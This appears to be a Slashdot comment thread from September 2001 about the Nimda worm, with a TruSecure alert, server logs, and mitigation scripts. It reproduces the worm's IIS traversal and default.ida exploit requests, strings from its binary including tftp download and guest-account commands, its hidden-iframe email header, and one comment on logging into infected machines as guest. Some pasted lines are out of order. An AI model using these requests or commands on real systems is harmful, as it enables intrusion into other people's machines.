/Msoffice/ cltreq.asp
This is not code red or a code red variant.
The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.
It is spreading very rapidly.
TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.
Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high
Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.
Cost -- Unknown, probably moderate per infected system.
The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.
Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.
Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.
We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .
REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.
Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.
Step 1. Get BSD or Linux
Step 2. Install.
Problem fixed.
Best Slashdot Co
Personally, I'd rather have a bunch of worms out there exploiting all the holes in my software so that the necessary companies can be notified and patch up these holes, rather than leaving the holes open and having only a few individuals hacking into peoples' machines and using it to their advantage.
Worms are a lot easier to catch, and sure they might cause a little havock in the short term, but in the long term I think we're all better off by making exploits widely known.
I started getting hit by computers on my subnet at 7:34:46am Mountain time (9:34am eastern time).
Nasty, each computer hit me at least 16 times, and my log is growing fast. (Good thing my logs are in their own partition).
MadCow.
I used to have a sig, but I set it free and it never came back.
2001-09-18 05:45:32 195.124.124.237 - 216.119.90.176 GET /default.ida
o _my_sisterli_'Doro'.Save_Whale_and_visit_<www.b uhaboard.de>_and_<www.buha-security.de>%u 9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003 %u8b00%u531b%u53ff%u0078%u0000%u00=a
Code_Green_<I_like_the_colour-_-><AntiCod eRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_ by_'Der_HexXer'-Wuerzburg_Germany-_is_dedicated_t
200 206 5995 500 HTTP/1.0 - - - -
Does anyone know what vulnerability this exploits? MS doesn't have a patch out yet. I have a win2k server running IIS (fully patched) and although I have been getting a large number of attacks, I haven't seen any side effects yet.
On a seperate note, 'bashing' windows and its users is a good way to show what a non-professional moron you are.
Since we can't hunt down the perps and kill them someone needs to write a flock of birds to eat all these worms. I figure anyone who's still keeping these worms alive is giving the world implicit permission to play in those exploits. So why not write up a listener that attacks the machine the worm comes from, using the same exploit to overwrite the worm, and create another BIRD.
(hmmm Binary Invasive Removal and Destruction?)
Nothing to say here... move along
I got readme.eml and look a quick look at it. It adds a user called guest to various interesting groups.
...
//machinename/share -I ip -U guest
So...
nmbstatus -A ip
MACHINENAME <00> - B <ACTIVE>
smbclient -L MACHINENAME -I ip -U guest
(no password)
Find a share
smbclient
(no password again)
Fun for all!
Here are some interesting strings found in the readme.exe this worm sends down (some stuff snipped):
S ha res\Security
/add
/add
/active
/add
. %c 1%1c../..%c1%1c..
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
SYSTEM\CurrentControlSet\Services\lanmanserver\
share c$=c:\
user guest ""
localgroup Administrators guest
localgroup Guests guest
user guest
open
user guest
HideFileExt
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
/Admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
I wasn't able to get to Security Focus to see what they had on this but I was able to get to CERT. They have this on their current activity page.
As of now there's not much more information there than is in the story already.
Other than the Code Red II backdoor it looks like it's mainly trying to exploit the unicode url hole.
EOF
Along with all of those windows gets, I am also getting a ton of something like this: 66.31.244.129 - - [18/Sep/2001:10:01:11 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 280 "-" "-"
Is this part of the same? It seems to be some sort of overflow of default.ida. I assume that I am ok running apache, because that seems to be the normal course for things, but just making sure.
It doesn't seem to execute under Windows 2000. When the payload attempted to run, it failed and a Dr. Watson error occurred.
_Very_ nasty, until IE 5 is patched!
q quick check of the logs shows i'm currently getting hits from 64.xxx.xxx.xxx addresses. even with the code red stuff .. i find it rather odd that i seem to only get hits from within my isp's class a address range.
if you want people to think you know what you are talking about, just put ".com" at the end of everything you say.com
Bah...I'm seeing about 8000 hits/sec on some of my bigger webservers. Thank god I have multiple oc-12's here at work.
40mb access_log file and growing.....
Thank god for Linux.
It presents itself as innocent filetype according to MIME [will defeat MIME-based screening]:
/add
/add
/active
/add
[-- Attachment #2: readme.exe --]
[-- Type: audio/x-wav, Encoding: base64, Size: 75K --]
Content-Type: audio/x-wav;
name="readme.exe"
Maybe some MUAs may believe the file extension rather than the MIME type and would execute it rather than one's audio player.
The code contains javascript to open itself, targetting HTML-parsing MUAs that have all the extra bells and whistles turned on. That's
most likely the intended vector of attack, and the MIME-typing is to sneak past simple mail screening programs.
Might be a SirCam variant (ie, to get the file names & types to be different for the MIME-fake], but a 'strings' run of the code shows
that it opens up the target machine for remote access:
share c$=c:\
user guest ""
localgroup Administrators guest
localgroup Guests guest
user guest
open
user guest
...that's all i got, detailed data from friend with the day off.
Someone who doesn't have the time nor inclination to futz with making an account
grep "24." /var/log/apache/error_log | grep -v default.ida | grep -v XXXXXXX | cut -d [ -f 3- | sort | uniq | wc -l
Number of unique attempts (1 of each type of attempt from each IP). Just replace "24." with the first part of your IP address.
357 uniques here, plus or minus a few oldies relating to my page. Around 900 or so total.
XML is like violence. If it doesn't solve the problem, use more.
Well, that was their take on Code Red (and all the other MS viruses), in their press releases, right? "We have saved the internet, and the world from the evil viruses!".
:)
Not a word on who created, not really the problem, but the possibility, as usual.
There was even a term, wasn't there? Something like MSTD - MicroSoft Transmittable Disease or something... anybody remember?
smtp strings
mime stuff
mapi stuff
winzip
http stuff
richtext dll stuff
hidden shares stuff
webserver sploits
net use stuff
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
...try this. its a pretty quick hack, and you'll need to modify the path to your apache logs in the grep line. but its what I just whipped up. hope its useful. I just ran it and it works for me.
/var/log/httpd/error_log | awk '{print $8}' | sed -e s/]//`; do
#!/bin/sh
for LUSER in `grep "winnt"
if [ ! "`ipchains -L -n | grep $LUSER`" ]
then ipchains -A input -s $LUSER -d 0/0 -j DENY
fi
done
I keep trying to pick fights, but I can't shake this Excellent karma.
I'm sorely tempted to write my ISP (ATT/Roadrunner) and say "Look, guys, do the math. Every Windows machine you have propagates X connections. Every Linux machine you let run propagates *0*. Shouldn't you consider officially encouraging people to run Linux?" But I expect that if I do that, they'll miss the point entirely and say "You're running Linux? Gasp! You're in violation of the terms of service!" It bugs me, because this seems like such a clear argument. Note that I didn't even say "make" people run it, just encourage. More Linux means less viruses. Seems like ISPs would think that's a good idea.
www.HearMySoulSpeak.com
TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm
Date: September 18, 2001
Time: 1000 EDT
RISK INDICES:
Initial Assessment: RED HOT
Threat: VERY HIGH, (rapidly increasing)
Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.
Cost: High, command execution is possible
Vulnerable Systems: IIS 4.0 and 5.0
SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm
It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.
The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:
Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/ cltreq.asp
This is not code red or a code red variant.
The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.
It is spreading very rapidly.
TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.
Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high
Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.
Cost -- Unknown, probably moderate per infected system.
The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.
Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.
Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.
We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .
REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.
Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.
is here:
# port80
http://www.cert.org/current/current_activity.html
It doesn't seem to be a new exploit. Just another package for the existing exploits. So, make sure you're current and you should be OK.
On the side...I haven't gotten any hits in our log files yet.
According to logs, the virus attacked my machine from the 64.x.x.x starting at 9:30 am EST (US). This is the megapath dsl/dialup IP addresses. Lots of unprotected home machines. Whee.
Odd. A smiliar attack hit me once around September 4th, but only tried the cmd.exe exploits.
Let's here it for the wet napkin Security!
My friend and I have created a little script that count the number of attack made by code red on my linux box. If you want to check it go to http:norak-info.com/cr/ more info email me at sebastien.premont@norak-info.com
lol
nt
To start putting in my posts. I know keeping a sense of humor is difficult lately, especially for those of us in target zones, but, Christ, do I need to start putting "Imagine a beowulf cluster of these" in every post?
Best Slashdot Co
This is from my log Apache log files... the virus appears to try a lot of exploits, all of which are Windows native. If this become widespread, expect a serious slowdown. (IP is masked for obvious reasons) xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:06 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:06 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:08 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+d ir HTTP/1.0" 404 232 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:20:01:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
Care to explain how anything that helps convince people not to use Microsoft can be called "annoying" ;-)
FYI:a .a @mm.html
http://www.sarc.com/avcenter/venc/data/w32.nimd
I discovered it with the readme.eml attachement. And btw, my IIS4 with the cumulative MS fix _has_ been compromised. Can't tell if it's new or not but it's efficient, for sure. Anyone knows how to be sure to get rid of it?
have you been defaced today?
access_log is now 1500% larger than normal...
Good judgement comes from experience, and experience comes from bad judgement.
- W. Wriston, former Citibank CEO
I'm getting a few unusual requests from my corner of the `Net. Our webserver is run by Lotus Domino on NT4, so theoretically all this should do is put a little more load on my server (which is about to croke anyway). Hey, maybe it will kill my server and the boss will spring for a replacement! (:
~LoudMusic
No sig for you. YOU GET NO SIG!
24.xxx.xxx.xxx affected.. just checked logs..
This is the preliminary information known at this time.
There is a new mass-mailing worm that utilizes email to propagate itself. The threat arrives as readme.exe in an email.
In addition, the worm sends out probes to IIS servers attempting to spread by using the Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised servers may display a webpage prompting a visitor to download an Outlook file which contains the worm as an attachment.
Also, the worm will create an open network share allowing access to the system. The worm will also attempt to spread via open network shares.
I think you guys do not realize that MS makes the best products. If it were n't there would be no point in chasing down bugs....Now UNIX and MAC are dead (officially as of when Bush went into office) So there is no need to cry and wine about Microsoft does this or it crashes. At least from a top down approach it is the most popular.
I think you guys need to take a few minutes...and get back to the one true operating system...Windows XP....(btw I am being sarcastic, I really think windows is waste of time and developemt)
We've got three infected workstations out of six here at work now. We were already planning on putting in six Linux workstations, but now we're going to have to go to all Linux (and Mac for the artists). This is ridiculous.
Any one of you damn "Stop bashing Microsoft, it could happen to any OS" bastards who comes on here is going to get a beating. Maybe it could, but it doesn't, and I for one am sick and tired of this crap. Goodbye, MS.
If it ain't broke, you need more software.
I've been hit 689 times today (9:29:35 AM - 12:07:46 PM). On the bright side, I was only hit with Code Red attempts 3 times today. Why do I get the feeling that cables modem providers are going to start shutting off port 80 again?
Also:
QUIT
Subject:
From:
DATA
RCPT TO:
MAIL FROM:
HELO
Microsoft has cost ISPs, businesses, and end users an incalculable amount of money and frustration and it is all due to their negligence. They were negligent when they created software and technologies that are so easily exploited. They were negligent in their testing of their products. They were negligent in not sending patch CDs through the mail to registered users. If they can send you upgrade offers via the mail, they can send you patch CDs to repair their defective products.
And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.
I'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.
this is the header (before the info) of the readme.eml file.
what does it mean exactly?
MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID:
So could this manifest itself as a connection that suddenly stops after a couple of seconds? i.e a SSH that will crap out if it tries to display a screen full o' stuff (pine, vi, lynx) Damn my cable, never had these problems on DSL :(
----- - The beatings will continue until morale improves
This thing is spreading fast.. 58000 hits on a single machine in such a short period of time, that is how many it got during the first DAY of code red.
:)
Gotta toss a green-w32nimda out there like the code-green worm
209.xx.xxx.xxx - - [18/Sep/2001:12:13:34 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
/MSADC/root.exe?/c+dir HTTP/1.0" 404 272
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
/_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 313
/_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 313
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+d ir HTTP/1.0" 404 296
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
209.xx.xxx.xxx - - [18/Sep/2001:12:13:34 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:34 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:35 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:35 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:35 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:35 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:35 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:35 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:35 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:36 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:36 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:36 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:36 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:36 -0400] "GET
209.xx.xxx.xxx - - [18/Sep/2001:12:13:36 -0400] "GET
all occurs in a second or two.
Found in readme.exe:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
I see Taco finally figured out the meaning of n. n. in math, an indefinite whole number. Nth. greatist unspecified ordinal number By the way, just to piss you off, I'd like to inform you this is still the Nth Post.
It is pitch dark. You are likely to be eaten by a grue.
Now this subject isn't exactly meaningless, but it certianly is suspicious.
Granted these guys are headed in the wrong direction, but u have got to hand it to em, some of this code is fantastic. Much better than ive seen elsewhere. Now if only there was someway to get em to create a virus that only took web pages off the net if they had the / tag in em ;)
I jsut checked a server I run over at RIT... it's been hit by over 20 boxes in the past hour. *shiiite*. Serves us right... we have all this wonderful IT department, and they can't even teach their students how to secure a box.
--You will rephrase your request for me to go to hell. Goto statements are not acceptable programming constructs
http://www.symantec.com/avcenter/venc/data/w32.nim da.a@mm.html
3.243F6A8885A308D313
I'm not Windows bashing- I'm pointing out something that is a real problem.
1) Linux/UNIX is not invulnerable, but it's been years since the Morris Worm. We're seeing a spate of this sort of stuff under NT- why? Is it because of sloppy admin work, lack of overall security in the design of Windows, or both?
2) If you can't apply security patches because it'll break your machine, then maybe there IS a problem with the OS.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
13:11:47 202.253.250.103 GET /MSADC/root.exe 401
** Resolved 202.253.250.103 to 1surg.kpu-m.ac.jp
Blah Blah Blah
Had about 10-15 attempts today on my parents AOL connection. I have authentication enabled on my server and seem ot have all patches i can find installed. I wanna be back behind my smoothwall install though.
I have mod_rewrite enabled so that any requests that specify a hostname other than www.mydomain.com get a redirect towards the full URI. However, I'm getting all requests being redirected, but they never actually follow the redirection...
Maan
I was going to various IP's that hit me and it isn't readme.eml, but readme.exe. In IE, it gives the standard "Open or Save" dialog.
If you want to see how bad this has become, look at the current internet traffic report. Internet traffic appears to have come to a halt. It can't really be as bad as it looks there (since I can still get through :), but this corresponds to the time I started seeing the attack in my server logs.
I remember reading something about someone doing this back when CodeRed II came out. He had a simple CGI to submit a shutdown command to the inquiring machine. Cool. :)
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Is Internet Explorer 6.0 vulnerable?
Oh yah. When I woke up I had about 1500 attacks from the 24.18.xxx.xxx address (my subnet on @home) and in the past 3 minutes since I cleard the logs, I've have 15 attacks from the same places. Sigh
Sleep is for the weak!
- Turn off any infected machine
- Prevent port 80 access for everyone
- Ignore it
1 is possible but it going to be a fair bit of work, 2 is going to peeve off a number of people but will solve the problem and 3 will just allow their whole network to grind to a halt.Don't know about everyone else but if this keeps up (with this virus and the 100 just around the door) we won't see many ISP's allowing web servers to run at all, ever.
(As a subnote, my bosses cable modem company, NTL, specifically forbid running a server on your own machines - although, as yet, they don't activily police it)
Avantslash - View Slashdot cleanly on your mobile phone.
Does anyone know of a tool or a quick fix to stop this thinging chewing up bandwidth?
I run debian and apache (as most of you proberly do) and I'm getting over a 100 requests a minute for it to infect my system. It certainly makes a good DoS worm for us non-MS users as my services slow down and /var creeps towards 100%.
Heuh? Well if the crackers can get out with an easy sentence like 240 hours of community service, I'm sure MS with all it's lawyers will have charges dropped.
Fortunately, running apache on irix, so it ain't no thing. :)
-m
http://www.invisik.com
I've seen those (and filtered them out of course..too much to read) for over 4 years at 2 different cable isps....I don't think that you're on the right track with this. I've used a strong ruleset in OpenBSD with nothing but the sshd running (no inetd/portmap/httpd/sendmail/etc) for over two years and still see them get denied...just don't worry about them.
Did a file search on my computer and found 'admin.dll' in two places. One was in c:\windows\system32\dllcache and the other was in C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm
.eml files or readme.exe, and I have patched against the Code Red exploits.
I do have IIS installed because I have done some web development (it's for my company, I'd rather they use Apache or somesuch, but...) I've also seen the 'alerts' and they state that the wormed 'admin.dll' is a 56k file -- mine is only 20k. What worries me is that if I delete it from either location it reappears within seconds from apparently nowhere. Anyone else have info regarding the filesize or the persistance of admin.dll?
I don't have any
STOP MISUSING APOSTROPHES, YOU MORONS!!!
The fine points of Internet ethics seem a little insignificant now compared to the harm that this new infection is doing. What next?
My estimate of intensity of this one is that it is costing me about 10 times the bytes per second of CR2. (We pay for our bytes in Australia!)
Anyone cleaned this virus succesfully yet (besides shutting down port 80 or turning off the server)?
Islamic Republic Of Iran
- Ministry Of Interior -
Own3d by the Dispatchers
Found out about it here. It loads pretty slow, so ya better use lynx or something.
Just wondering if that's a good thing to do if IE 6 isn't vulnerable. Just have everyone hit Windows Update and upgrade.... Thanks.
-m
http://www.invisik.com
Well, you can.
Just start training all your users on dumb termnals.
And start pulling all the RS-232 cable.
Well, I'm not sure why, but in addition to all my friends, it sent it out to all the people who've emailed me... including, it seems, all the various spammers who've found my email address. And I'm getting it all returned because their inboxes are full.
Ah, I love poetic justice.
Quoth the zombie, braaaaaaaains
It looks like somebody managed to patch all those code red [2] infected servers! I havn't gotten a single code red [2] attack since 9:30 this morning! Of course, all those error messages have now been replaced with 16 lines of error messages, and the frequency has gone up exponentially...
Hey, give me back my code red [2] error messages!
I've touched up the Apache::CodeRed Apache Perl module if anyone is using it. I've included examples on which Locations to set the handler to to catch the new attack as well.
t ch
t ar .gz
This is an unofficial patch. I've emailed the author this patch as well.
Patch from 1.07 to my 1.08:
http://woodynet.siscom.net/CodeRed-1.07-1.08.pa
Full tarball of my 1.08
http://woodynet.siscom.net/Apache-CodeRed-1.08.
-Woodstock
-Sir Woody Hackswell, the Arch-Fool
208.
207.
65.
63.
For the record, I'm in 208.
install the Windows Resource Kit.
.ext filename [/q /d /f]
.ext Extension to be associated.
.ext with.
/q Quiet - Suppresses all interactive prompts.
/d Delete - Deletes the association if it exists.
/f Force - Forces overwrite or delete without questions.
.Lst NotePad.Exe
.Lst with Notepad.Exe.
.Lst /d
.Lst from Notepad.Exe.
.Lst
.Lst if it exists.
.eml /d
read...
C:\Program Files\Resource Kit>associate
Registers or Unregisters a file extension operating system shell.
ASSOCIATE
filename Execuatble program to associate
Examples:
Associate
Adds the association of
Associate
Deletes the association of
Associate
Returns the association for
Return Value:
A return value of zero indicates success.
C:\Program Files\Resource Kit>associate
Remove association ".eml,"%ProgramFiles%\Outlook Express\msimn.exe"" (y/n) ? Y
Association ".eml,"%ProgramFiles%\Outlook Express\msimn.exe"" removed
C:\Program Files\Resource Kit>
I would forward this to the Help Desk people here, but then they'd know I was reading
Just e-mail them this link: www.glowingplate.com/ida.shtml. Tell them that a friend sent it to you.
The link goes to a page offering a real-time view of the new worm attacking my machine.
Fire and Meat. Yummy.
--Mike--
I am getting pounded by this worm. Check out my web traffic graph:
http://bang.dhs.org/mrtg/webhits.html
the part up to 12 noon is the worm; anything above that is slashdot.
I'm on @home, 24.114.*.*.
-- Steve van Egmond, b.math
...but then, as it's trying everything, it would be...
I keep seeing these nasty little errors in the midst of a flurry of worm requests:
[Tue Sep 18 09:32:51 2001] [notice] child pid 20122 exit signal Segmentation Fault (11)
Anyone else seeing this?
Liberty in your lifetime
Just to add my name to the list, my company's server has also been hit. It turns out the servers sends TWO files to the client: a readme.eml, and a readme.exe. I'm gonna setup a test box to see what these files do.
Frustrated in Chicago,
-Suffering Bastard
"Molest me not with this pocket calculator stuff."
- Deep Thought
I'm fairly sure this will work, but IANAMSCE...
Go to Tools > Internet Options > Advanced.
Uncheck 'Play sounds in web pages'.
The trojan of course is infecting IIS machines using the standard sadmind tactics (in fact it looks like it's just hitching a ride on it), but then it installs an ISAPI filter or the like and serves up a file called README.exe to all visiting clients. I can't verify but it does look like it DIDN'T automatically run the file in either 2000/IE6 or 2000/IE 5.5, however it does launch a window at 6000x6000. If the file is run (presumably automatically on infected IIS servers) it does a variety of things such as apparently encapsulating the Concept word macro virus, and it also enables the Guest user account and sets it to have full permissions on the C$ share. I can see this by simply looking at the readme.exe (gosh I hope the virus writers don't chase me with the DCMA...).
What I want to know is what the readme.eml attachment is doing in the window at 6000x6000.
